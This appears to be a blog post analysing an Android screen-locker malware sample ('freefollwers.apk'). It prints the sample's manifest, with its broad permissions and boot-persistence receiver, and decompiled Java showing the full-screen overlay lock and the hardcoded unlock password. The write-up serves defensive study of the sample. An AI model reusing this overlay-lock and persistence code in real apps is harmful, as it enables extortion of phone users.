Android Malware Analysis Series - freefollwers.apk
File Information: https://twitter.com/malwrhunterteam/status/1534958788096233472?s=20&t=OAEC5DdvJDvRp6SRsaaUaw
Sample Source: https://bazaar.abuse.ch/sample/5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e/#intel
SHA256 Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e
Introduction
The freefollowers.apk appears to targeting people who use social media and are looking to up the amount of followers for their social media accounts. Specifically targeting users of android. I am not entirely sure the delivery method this malware uses, but I found this sample APK via a Google search using the SHA256 hash. It appears that this piece of android malware was posted by Malware Hunters twitter on June 9th of 2022. Though I have found a variant on Virus Total here. In the URL it identifies the malware as Android Locker.
This malware “screenlocks” the device by creating an overlay to instruct the user to send money to the address provided in the screenshot. Once the user does so the user can unlock the device with a password provided by the malware authors.
Decompilation and Analysis
Usually I would start a security audit of an Android APK with first doing a bit of automated analysis along with some manual code review of the underlying APK structure. Gaining first an idea of what permissions, activities, and classes are being called in the manifest file. Then moving on from there.
I deployed an Android emulated device specific to this test in Android Studio. The manifest file explicitly calls out Android API 23 Marshmallow. I install the malware via adb then did a reboot of the emulated device to get the screenshot below.
As you can tell the actors of this malware go by an anonymous group XPhantom.
Manifest.xml file
Digging into the freefollowers.apk I observed one activity, one service, and one receiver in the Manifest.xml file. We can also see multiple permissions such as external_storage, read_contacts, read_sms and receive_boot_completed.
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:installLocation="internalOnly" android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" package="com.XPhantom.id" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
<uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGE"/>
<uses-permission android:name="android.permission.CAMERA"/>
<application android:theme="@style/AppTheme" android:label="@string/app_name" android:icon="@drawable/ic_launcher" android:debuggable="true">
<activity android:label="@string/app_name" android:name="com.XPhantom.p000id.MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.INFO"/>
</intent-filter>
</activity>
<service android:name="com.XPhantom.p000id.MyService" android:enabled="true"/>
<receiver android:name="com.XPhantom.p000id.BootReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED" android:enabled="true">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
<action android:name="android.intent.action.QUICKBOOT_POWERON"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
</receiver>
</application>
</manifest>
MainActivity
In the MainActivity java code below we can see that the malware starts the service ****MyService.****
package com.XPhantom.p000id;
import adrt.ADRTLogCatReader;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
/* renamed from: com.XPhantom.id.MainActivity */
/* loaded from: classes.dex */
public class MainActivity extends Activity {
@Override // android.app.Activity
public void onCreate(Bundle bundle) {
ADRTLogCatReader.onContext(this, "com.aide.ui");
super.onCreate(bundle);
try {
startService(new Intent(this, Class.forName("com.XPhantom.id.MyService")));
finish();
} catch (ClassNotFoundException e) {
throw new NoClassDefFoundError(e.getMessage());
}
}
}
MyService Activity
After overviewing the classes baked into this piece of malware MyService appears to be the main functionality being called from MainActivity.
On line 23 of the MyService class there is a reference to LayoutInflater this is used in this malware sample to overlay a View onto the device. Disabling the user from using their phone and even with a restart will continue the LayoutInflater view.
public class MyService extends Service {
ImageView chatHead;
Context context;
/* renamed from: e1 */
EditText f0e1;
ViewGroup myView;
WindowManager windowManager;
@Override // android.app.Service
public void onCreate() {
ADRTLogCatReader.onContext(this, "com.aide.ui");
this.windowManager = (WindowManager) getSystemService("window");
this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(C0000R.layout.main, (ViewGroup) null);
this.chatHead = new ImageView(this);
this.chatHead.setImageResource(C0000R.drawable.ic_launcher);
this.f0e1 = (EditText) this.myView.findViewById(C0000R.C0001id.mainEditText1);
((Button) this.myView.findViewById(C0000R.C0001id.mainButton1)).setOnClickListener(new View.OnClickListener(this) { // from class: com.XPhantom.id.MyService.100000000
private final MyService this$0;
https://developer.android.com/reference/android/view/LayoutInflater
Secondly, the link above to the developer reference makes note of an XML file. Which appears to loading the View defined by either the developer or in our case the malware author. If we take a look at the strings.xml file we can observe the same resources being applied to the LayoutInflater View via the C000R class.
Thirdly, we can see in the following java code snippet that the malware has a hardcoded string. The hardcoded string allows for the LayoutInflater that overlays on the device to be “removed”. Once this string has been submitted into the getText field which appears to be the password the malware stops the overlay and the user can begin using the device again.
@Override // android.view.View.OnClickListener
public void onClick(View view) {
if (this.this$0.f0e1.getText().toString().equals("Abdullah@")) {
this.this$0.windowManager.removeView(this.this$0.myView);
try {
this.this$0.context.startService(new Intent(this.this$0.context, Class.forName("com.XPhantom.id.MyService")));
return;
} catch (ClassNotFoundException e) {
throw new NoClassDefFoundError(e.getMessage());
}
}
Thanks for reading, and look out for future posts analyzing malware samples in 2023.